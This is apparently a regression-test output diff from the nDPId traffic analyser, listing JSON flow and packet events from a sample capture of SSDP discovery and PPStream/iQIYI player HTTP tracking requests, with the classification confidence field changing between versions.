-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1467353163154,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353163154,"pkt":"AQBef\/\/6bEAIlAI6CABFAACljZ0AAAERddjAqAUw7\/\/\/+vm6B2wAkVW0TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1467353165300,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165300,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGfJAAIAG0FjAqHMIymwO7MU\/AFBSz4AccUHHfVAYQTf+XQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDcmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 
-01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353165047&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353165047&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1467353165410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353165410,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5NehAADMGBE7KbA7swKhzCABQxT9xQcd9Us+DmFAYACAMewAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1467353165456,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAAUUGh1AAIAGeifAqHMIZePIC8VAAFBgEsEemWlGj1AQ\/\/DZSAAAR0VUIC90cmFjazI\/YT0wJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxNjUmYz05NjY1NDJjODJhNTY5NGQwZTk0M2Q1MGQ1ZmNmNWE1NSZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTQ5MzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTIzNDQ3JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPThlZGI2OTRjOGM4Y2NhOTIzZDNlYWU2NjIyZjlhZWU2JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU0ODU4JnZlPTEmdz00LDUgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHY
W9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"} -01396{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=0&as=1;2,3;4,5&b=1467353165&c=966542c82a5694d0e943d50d5fcf5a55&cv=5.2.15.2240&d=5000000854934&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000923447&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=8edb694c8c8cca923d3eae6622f9aee6&sv=4.10.004&u=1&up=&v=5000000854858&ve=1&w=4,5","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+01396{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=0&as=1;2,3;4,5&b=1467353165&c=966542c82a5694d0e943d50d5fcf5a55&cv=5.2.15.2240&d=5000000854934&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000923447&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=8edb694c8c8cca923d3eae6622f9aee6&sv=4.10.004&u=1&up=&v=5000000854858&ve=1&w=4,5","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1467353165456,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAADjGh5AAIAGflfAqHMIZePIC8VAAFBgEsYKmWlGj1AY\/\/BFbwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} 00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1467353165492,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353165492,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkdU5AAC8Gc+Zl48gLwKhzCABQxUCZaUaPYBLGxVAYP\/ygXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7580000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1467353165563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1004,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1004,"pkt_l4_len":970,"thread_ts_msec":1467353165563,"pkt":"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"} -00989{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7580000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/mkt.gif?ai=8452891900c903ae7a876447923a5aec&et=0","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 
6.0)\/QY-Player-Windows\/2.0.102"}} +00989{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7580000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/mkt.gif?ai=8452891900c903ae7a876447923a5aec&et=0","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1467353165612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165612,"pkt":"ABxCjnAxTF4M6gNlCABFAADj3khAAC0GT217fXAxwKhzCABQxUHmpXH1I+1Zk1AYAIIWkgAASFRUUC8xLjEgMjA0IE5vIENvbnRlbnQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvZ2lmDQpDYWNoZS1Db250cm9sOiBwcml2YXRlLCBtYXgtYWdlPTAsIG5vLWNhY2hlDQpQcmFnbWE6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjowNSBHTVQNClNlcnZlcjogYXBhY2hlDQoNCg=="} 
01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1467353165616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165616,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGkVAAIAG0AXAqHMIymwO7MU\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"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1467353165659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1467353165659,"pkt":"ABxCjnAxTF4M6gNlCABFAAAo3kpAAC0GUCZ7fXAxwKhzCABQxUHmpXKwI+1ZlFARAILziAAAAAAAAAAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1467353166729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1467353166729,"pkt":"AQBef\/\/69AnYH69kCABFAAB0AABAAAERw5fAqAU\/7\/\/\/+pnXB2wAYBOHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KTWFuOnNzZHA6ZGlzY292ZXINCnN0OnNzZHA6YWxsDQpNWDozDQoNCg=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1120,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1467353166729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1467353166729,"pkt":"AQBef\/\/69AnYH69kCABFAACXAABAAAERw3TAqAU\/7\/\/\/+u4wB2wAg73KTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KTWFuOnNzZHA6ZGlzY292ZXINCnN0OnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVJlbmRlcmVyOjENCk1YOjMNCg0K"} 